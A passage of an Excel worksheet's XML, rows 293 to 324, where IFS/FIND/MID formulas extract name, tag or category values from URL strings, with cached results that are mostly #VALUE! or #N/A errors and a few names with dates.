    ISNUMBER(FIND("category",$A293)), MID($A293, FIND("category",$A293) + 9, LEN($A293) - FIND("category",$A293)))</f>
        <v>#N/A</v>
      </c>
      <c r="F293" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="294" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A294" t="s">
        <v>2357</v>
      </c>
      <c r="B294" t="str">
        <f t="shared" si="13"/>
        <v>Ushasi&amp;date=2024-07-24</v>
      </c>
      <c r="C294" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D294" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E294" t="str" cm="1">
        <f t="array" ref="E294">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A294)), MID($A294, FIND("name=",$A294) + 5, LEN($A294) - FIND("name=",$A294)),
    ISNUMBER(FIND("tag/",$A294)), MID($A294, FIND("tag/",$A294) + 4, LEN($A294) - FIND("tag/",$A294)),
    ISNUMBER(FIND("category",$A294)), MID($A294, FIND("category",$A294) + 9, LEN($A294) - FIND("category",$A294)))</f>
        <v>Ushasi&amp;date=2024-07-24</v>
      </c>
      <c r="F294" t="s">
        <v>3340</v>
      </c>
    </row>
    <row r="295" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A295" t="s">
        <v>2357</v>
      </c>
      <c r="B295" t="str">
        <f t="shared" si="13"/>
        <v>Ushasi&amp;date=2024-07-24</v>
      </c>
      <c r="C295" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D295" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E295" t="str" cm="1">
        <f t="array" ref="E295">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A295)), MID($A295, FIND("name=",$A295) + 5, LEN($A295) - FIND("name=",$A295)),
    ISNUMBER(FIND("tag/",$A295)), MID($A295, FIND("tag/",$A295) + 4, LEN($A295) - FIND("tag/",$A295)),
    ISNUMBER(FIND("category",$A295)), MID($A295, FIND("category",$A295) + 9, LEN($A295) - FIND("category",$A295)))</f>
        <v>Ushasi&amp;date=2024-07-24</v>
      </c>
      <c r="F295" t="s">
        <v>3340</v>
      </c>
    </row>
    <row r="296" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A296" t="s">
        <v>2254</v>
      </c>
      <c r="B296" t="str">
        <f t="shared" si="13"/>
        <v>Dhivya%20Duraisamy&amp;date=2023-12-26</v>
      </c>
      <c r="C296" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D296" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E296" t="str" cm="1">
        <f t="array" ref="E296">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A296)), MID($A296, FIND("name=",$A296) + 5, LEN($A296) - FIND("name=",$A296)),
    ISNUMBER(FIND("tag/",$A296)), MID($A296, FIND("tag/",$A296) + 4, LEN($A296) - FIND("tag/",$A296)),
    ISNUMBER(FIND("category",$A296)), MID($A296, FIND("category",$A296) + 9, LEN($A296) - FIND("category",$A296)))</f>
        <v>Dhivya%20Duraisamy&amp;date=2023-12-26</v>
      </c>
      <c r="F296" t="s">
        <v>3301</v>
      </c>
    </row>
    <row r="297" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A297" t="s">
        <v>2358</v>
      </c>
      <c r="B297" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C297" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D297" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E297" t="e" cm="1">
        <f t="array" ref="E297">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A297)), MID($A297, FIND("name=",$A297) + 5, LEN($A297) - FIND("name=",$A297)),
    ISNUMBER(FIND("tag/",$A297)), MID($A297, FIND("tag/",$A297) + 4, LEN($A297) - FIND("tag/",$A297)),
    ISNUMBER(FIND("category",$A297)), MID($A297, FIND("category",$A297) + 9, LEN($A297) - FIND("category",$A297)))</f>
        <v>#N/A</v>
      </c>
      <c r="F297" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="298" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A298" t="s">
        <v>2262</v>
      </c>
      <c r="B298" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C298" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D298" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E298" t="e" cm="1">
        <f t="array" ref="E298">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A298)), MID($A298, FIND("name=",$A298) + 5, LEN($A298) - FIND("name=",$A298)),
    ISNUMBER(FIND("tag/",$A298)), MID($A298, FIND("tag/",$A298) + 4, LEN($A298) - FIND("tag/",$A298)),
    ISNUMBER(FIND("category",$A298)), MID($A298, FIND("category",$A298) + 9, LEN($A298) - FIND("category",$A298)))</f>
        <v>#N/A</v>
      </c>
      <c r="F298" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="299" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A299" t="s">
        <v>2260</v>
      </c>
      <c r="B299" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C299" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D299" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E299" t="e" cm="1">
        <f t="array" ref="E299">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A299)), MID($A299, FIND("name=",$A299) + 5, LEN($A299) - FIND("name=",$A299)),
    ISNUMBER(FIND("tag/",$A299)), MID($A299, FIND("tag/",$A299) + 4, LEN($A299) - FIND("tag/",$A299)),
    ISNUMBER(FIND("category",$A299)), MID($A299, FIND("category",$A299) + 9, LEN($A299) - FIND("category",$A299)))</f>
        <v>#N/A</v>
      </c>
      <c r="F299" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="300" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A300" t="s">
        <v>2359</v>
      </c>
      <c r="B300" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C300" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D300" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E300" t="e" cm="1">
        <f t="array" ref="E300">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A300)), MID($A300, FIND("name=",$A300) + 5, LEN($A300) - FIND("name=",$A300)),
    ISNUMBER(FIND("tag/",$A300)), MID($A300, FIND("tag/",$A300) + 4, LEN($A300) - FIND("tag/",$A300)),
    ISNUMBER(FIND("category",$A300)), MID($A300, FIND("category",$A300) + 9, LEN($A300) - FIND("category",$A300)))</f>
        <v>#N/A</v>
      </c>
      <c r="F300" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="301" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A301" t="s">
        <v>2264</v>
      </c>
      <c r="B301" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C301" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D301" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E301" t="e" cm="1">
        <f t="array" ref="E301">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A301)), MID($A301, FIND("name=",$A301) + 5, LEN($A301) - FIND("name=",$A301)),
    ISNUMBER(FIND("tag/",$A301)), MID($A301, FIND("tag/",$A301) + 4, LEN($A301) - FIND("tag/",$A301)),
    ISNUMBER(FIND("category",$A301)), MID($A301, FIND("category",$A301) + 9, LEN($A301) - FIND("category",$A301)))</f>
        <v>#N/A</v>
      </c>
      <c r="F301" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="302" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A302" t="s">
        <v>2260</v>
      </c>
      <c r="B302" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C302" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D302" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E302" t="e" cm="1">
        <f t="array" ref="E302">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A302)), MID($A302, FIND("name=",$A302) + 5, LEN($A302) - FIND("name=",$A302)),
    ISNUMBER(FIND("tag/",$A302)), MID($A302, FIND("tag/",$A302) + 4, LEN($A302) - FIND("tag/",$A302)),
    ISNUMBER(FIND("category",$A302)), MID($A302, FIND("category",$A302) + 9, LEN($A302) - FIND("category",$A302)))</f>
        <v>#N/A</v>
      </c>
      <c r="F302" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="303" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A303" t="s">
        <v>2262</v>
      </c>
      <c r="B303" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C303" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D303" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E303" t="e" cm="1">
        <f t="array" ref="E303">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A303)), MID($A303, FIND("name=",$A303) + 5, LEN($A303) - FIND("name=",$A303)),
    ISNUMBER(FIND("tag/",$A303)), MID($A303, FIND("tag/",$A303) + 4, LEN($A303) - FIND("tag/",$A303)),
    ISNUMBER(FIND("category",$A303)), MID($A303, FIND("category",$A303) + 9, LEN($A303) - FIND("category",$A303)))</f>
        <v>#N/A</v>
      </c>
      <c r="F303" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="304" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A304" t="s">
        <v>2265</v>
      </c>
      <c r="B304" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C304" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D304" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E304" t="e" cm="1">
        <f t="array" ref="E304">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A304)), MID($A304, FIND("name=",$A304) + 5, LEN($A304) - FIND("name=",$A304)),
    ISNUMBER(FIND("tag/",$A304)), MID($A304, FIND("tag/",$A304) + 4, LEN($A304) - FIND("tag/",$A304)),
    ISNUMBER(FIND("category",$A304)), MID($A304, FIND("category",$A304) + 9, LEN($A304) - FIND("category",$A304)))</f>
        <v>#N/A</v>
      </c>
      <c r="F304" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="305" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A305" t="s">
        <v>2319</v>
      </c>
      <c r="B305" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C305" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D305" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E305" t="e" cm="1">
        <f t="array" ref="E305">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A305)), MID($A305, FIND("name=",$A305) + 5, LEN($A305) - FIND("name=",$A305)),
    ISNUMBER(FIND("tag/",$A305)), MID($A305, FIND("tag/",$A305) + 4, LEN($A305) - FIND("tag/",$A305)),
    ISNUMBER(FIND("category",$A305)), MID($A305, FIND("category",$A305) + 9, LEN($A305) - FIND("category",$A305)))</f>
        <v>#N/A</v>
      </c>
      <c r="F305" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="306" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A306" t="s">
        <v>2268</v>
      </c>
      <c r="B306" t="str">
        <f t="shared" si="13"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C306" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D306" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E306" t="str" cm="1">
        <f t="array" ref="E306">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A306)), MID($A306, FIND("name=",$A306) + 5, LEN($A306) - FIND("name=",$A306)),
    ISNUMBER(FIND("tag/",$A306)), MID($A306, FIND("tag/",$A306) + 4, LEN($A306) - FIND("tag/",$A306)),
    ISNUMBER(FIND("category",$A306)), MID($A306, FIND("category",$A306) + 9, LEN($A306) - FIND("category",$A306)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F306" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="307" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A307" t="s">
        <v>2293</v>
      </c>
      <c r="B307" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C307" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D307" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E307" t="e" cm="1">
        <f t="array" ref="E307">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A307)), MID($A307, FIND("name=",$A307) + 5, LEN($A307) - FIND("name=",$A307)),
    ISNUMBER(FIND("tag/",$A307)), MID($A307, FIND("tag/",$A307) + 4, LEN($A307) - FIND("tag/",$A307)),
    ISNUMBER(FIND("category",$A307)), MID($A307, FIND("category",$A307) + 9, LEN($A307) - FIND("category",$A307)))</f>
        <v>#N/A</v>
      </c>
      <c r="F307" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="308" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A308" t="s">
        <v>2294</v>
      </c>
      <c r="B308" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C308" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D308" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E308" t="e" cm="1">
        <f t="array" ref="E308">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A308)), MID($A308, FIND("name=",$A308) + 5, LEN($A308) - FIND("name=",$A308)),
    ISNUMBER(FIND("tag/",$A308)), MID($A308, FIND("tag/",$A308) + 4, LEN($A308) - FIND("tag/",$A308)),
    ISNUMBER(FIND("category",$A308)), MID($A308, FIND("category",$A308) + 9, LEN($A308) - FIND("category",$A308)))</f>
        <v>#N/A</v>
      </c>
      <c r="F308" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="309" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A309" t="s">
        <v>2295</v>
      </c>
      <c r="B309" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C309" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D309" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E309" t="e" cm="1">
        <f t="array" ref="E309">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A309)), MID($A309, FIND("name=",$A309) + 5, LEN($A309) - FIND("name=",$A309)),
    ISNUMBER(FIND("tag/",$A309)), MID($A309, FIND("tag/",$A309) + 4, LEN($A309) - FIND("tag/",$A309)),
    ISNUMBER(FIND("category",$A309)), MID($A309, FIND("category",$A309) + 9, LEN($A309) - FIND("category",$A309)))</f>
        <v>#N/A</v>
      </c>
      <c r="F309" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="310" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A310" t="s">
        <v>2296</v>
      </c>
      <c r="B310" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C310" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D310" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E310" t="e" cm="1">
        <f t="array" ref="E310">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A310)), MID($A310, FIND("name=",$A310) + 5, LEN($A310) - FIND("name=",$A310)),
    ISNUMBER(FIND("tag/",$A310)), MID($A310, FIND("tag/",$A310) + 4, LEN($A310) - FIND("tag/",$A310)),
    ISNUMBER(FIND("category",$A310)), MID($A310, FIND("category",$A310) + 9, LEN($A310) - FIND("category",$A310)))</f>
        <v>#N/A</v>
      </c>
      <c r="F310" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="311" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A311" t="s">
        <v>2297</v>
      </c>
      <c r="B311" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C311" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D311" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E311" t="e" cm="1">
        <f t="array" ref="E311">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A311)), MID($A311, FIND("name=",$A311) + 5, LEN($A311) - FIND("name=",$A311)),
    ISNUMBER(FIND("tag/",$A311)), MID($A311, FIND("tag/",$A311) + 4, LEN($A311) - FIND("tag/",$A311)),
    ISNUMBER(FIND("category",$A311)), MID($A311, FIND("category",$A311) + 9, LEN($A311) - FIND("category",$A311)))</f>
        <v>#N/A</v>
      </c>
      <c r="F311" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="312" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A312" t="s">
        <v>2296</v>
      </c>
      <c r="B312" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C312" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D312" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E312" t="e" cm="1">
        <f t="array" ref="E312">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A312)), MID($A312, FIND("name=",$A312) + 5, LEN($A312) - FIND("name=",$A312)),
    ISNUMBER(FIND("tag/",$A312)), MID($A312, FIND("tag/",$A312) + 4, LEN($A312) - FIND("tag/",$A312)),
    ISNUMBER(FIND("category",$A312)), MID($A312, FIND("category",$A312) + 9, LEN($A312) - FIND("category",$A312)))</f>
        <v>#N/A</v>
      </c>
      <c r="F312" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="313" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A313" t="s">
        <v>2248</v>
      </c>
      <c r="B313" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C313" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D313" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E313" t="e" cm="1">
        <f t="array" ref="E313">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A313)), MID($A313, FIND("name=",$A313) + 5, LEN($A313) - FIND("name=",$A313)),
    ISNUMBER(FIND("tag/",$A313)), MID($A313, FIND("tag/",$A313) + 4, LEN($A313) - FIND("tag/",$A313)),
    ISNUMBER(FIND("category",$A313)), MID($A313, FIND("category",$A313) + 9, LEN($A313) - FIND("category",$A313)))</f>
        <v>#N/A</v>
      </c>
      <c r="F313" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="314" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A314" t="s">
        <v>2248</v>
      </c>
      <c r="B314" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C314" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D314" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E314" t="e" cm="1">
        <f t="array" ref="E314">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A314)), MID($A314, FIND("name=",$A314) + 5, LEN($A314) - FIND("name=",$A314)),
    ISNUMBER(FIND("tag/",$A314)), MID($A314, FIND("tag/",$A314) + 4, LEN($A314) - FIND("tag/",$A314)),
    ISNUMBER(FIND("category",$A314)), MID($A314, FIND("category",$A314) + 9, LEN($A314) - FIND("category",$A314)))</f>
        <v>#N/A</v>
      </c>
      <c r="F314" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="315" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A315" t="s">
        <v>2268</v>
      </c>
      <c r="B315" t="str">
        <f t="shared" si="13"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C315" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D315" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E315" t="str" cm="1">
        <f t="array" ref="E315">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A315)), MID($A315, FIND("name=",$A315) + 5, LEN($A315) - FIND("name=",$A315)),
    ISNUMBER(FIND("tag/",$A315)), MID($A315, FIND("tag/",$A315) + 4, LEN($A315) - FIND("tag/",$A315)),
    ISNUMBER(FIND("category",$A315)), MID($A315, FIND("category",$A315) + 9, LEN($A315) - FIND("category",$A315)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F315" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="316" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A316" t="s">
        <v>2360</v>
      </c>
      <c r="B316" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C316" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D316" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E316" t="e" cm="1">
        <f t="array" ref="E316">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A316)), MID($A316, FIND("name=",$A316) + 5, LEN($A316) - FIND("name=",$A316)),
    ISNUMBER(FIND("tag/",$A316)), MID($A316, FIND("tag/",$A316) + 4, LEN($A316) - FIND("tag/",$A316)),
    ISNUMBER(FIND("category",$A316)), MID($A316, FIND("category",$A316) + 9, LEN($A316) - FIND("category",$A316)))</f>
        <v>#N/A</v>
      </c>
      <c r="F316" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="317" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A317" t="s">
        <v>2361</v>
      </c>
      <c r="B317" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C317" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D317" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E317" t="e" cm="1">
        <f t="array" ref="E317">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A317)), MID($A317, FIND("name=",$A317) + 5, LEN($A317) - FIND("name=",$A317)),
    ISNUMBER(FIND("tag/",$A317)), MID($A317, FIND("tag/",$A317) + 4, LEN($A317) - FIND("tag/",$A317)),
    ISNUMBER(FIND("category",$A317)), MID($A317, FIND("category",$A317) + 9, LEN($A317) - FIND("category",$A317)))</f>
        <v>#N/A</v>
      </c>
      <c r="F317" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="318" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A318" t="s">
        <v>2248</v>
      </c>
      <c r="B318" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C318" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D318" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E318" t="e" cm="1">
        <f t="array" ref="E318">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A318)), MID($A318, FIND("name=",$A318) + 5, LEN($A318) - FIND("name=",$A318)),
    ISNUMBER(FIND("tag/",$A318)), MID($A318, FIND("tag/",$A318) + 4, LEN($A318) - FIND("tag/",$A318)),
    ISNUMBER(FIND("category",$A318)), MID($A318, FIND("category",$A318) + 9, LEN($A318) - FIND("category",$A318)))</f>
        <v>#N/A</v>
      </c>
      <c r="F318" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="319" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A319" t="s">
        <v>2268</v>
      </c>
      <c r="B319" t="str">
        <f t="shared" si="13"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C319" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D319" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E319" t="str" cm="1">
        <f t="array" ref="E319">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A319)), MID($A319, FIND("name=",$A319) + 5, LEN($A319) - FIND("name=",$A319)),
    ISNUMBER(FIND("tag/",$A319)), MID($A319, FIND("tag/",$A319) + 4, LEN($A319) - FIND("tag/",$A319)),
    ISNUMBER(FIND("category",$A319)), MID($A319, FIND("category",$A319) + 9, LEN($A319) - FIND("category",$A319)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F319" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="320" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A320" t="s">
        <v>2362</v>
      </c>
      <c r="B320" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C320" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D320" t="str">
        <f t="shared" si="15"/>
        <v>updates/</v>
      </c>
      <c r="E320" t="str" cm="1">
        <f t="array" ref="E320">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A320)), MID($A320, FIND("name=",$A320) + 5, LEN($A320) - FIND("name=",$A320)),
    ISNUMBER(FIND("tag/",$A320)), MID($A320, FIND("tag/",$A320) + 4, LEN($A320) - FIND("tag/",$A320)),
    ISNUMBER(FIND("category",$A320)), MID($A320, FIND("category",$A320) + 9, LEN($A320) - FIND("category",$A320)))</f>
        <v>updates/</v>
      </c>
      <c r="F320" t="s">
        <v>3341</v>
      </c>
    </row>
    <row r="321" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A321" t="s">
        <v>2363</v>
      </c>
      <c r="B321" t="str">
        <f t="shared" si="13"/>
        <v>Suriya+Praba</v>
      </c>
      <c r="C321" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D321" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E321" t="str" cm="1">
        <f t="array" ref="E321">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A321)), MID($A321, FIND("name=",$A321) + 5, LEN($A321) - FIND("name=",$A321)),
    ISNUMBER(FIND("tag/",$A321)), MID($A321, FIND("tag/",$A321) + 4, LEN($A321) - FIND("tag/",$A321)),
    ISNUMBER(FIND("category",$A321)), MID($A321, FIND("category",$A321) + 9, LEN($A321) - FIND("category",$A321)))</f>
        <v>Suriya+Praba</v>
      </c>
      <c r="F321" t="s">
        <v>3342</v>
      </c>
    </row>
    <row r="322" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A322" t="s">
        <v>2270</v>
      </c>
      <c r="B322" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C322" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D322" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E322" t="e" cm="1">
        <f t="array" ref="E322">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A322)), MID($A322, FIND("name=",$A322) + 5, LEN($A322) - FIND("name=",$A322)),
    ISNUMBER(FIND("tag/",$A322)), MID($A322, FIND("tag/",$A322) + 4, LEN($A322) - FIND("tag/",$A322)),
    ISNUMBER(FIND("category",$A322)), MID($A322, FIND("category",$A322) + 9, LEN($A322) - FIND("category",$A322)))</f>
        <v>#N/A</v>
      </c>
      <c r="F322" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="323" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A323" t="s">
        <v>2364</v>
      </c>
      <c r="B323" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C323" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D323" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E323" t="e" cm="1">
        <f t="array" ref="E323">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A323)), MID($A323, FIND("name=",$A323) + 5, LEN($A323) - FIND("name=",$A323)),
    ISNUMBER(FIND("tag/",$A323)), MID($A323, FIND("tag/",$A323) + 4, LEN($A323) - FIND("tag/",$A323)),
    ISNUMBER(FIND("category",$A323)), MID($A323, FIND("category",$A323) + 9, LEN($A323) - FIND("category",$A323)))</f>
        <v>#N/A</v>
      </c>
      <c r="F323" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="324" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A324" t="s">
        <v>2248</v>
      </c>
      <c r="B324" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C324" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D324" t="e">
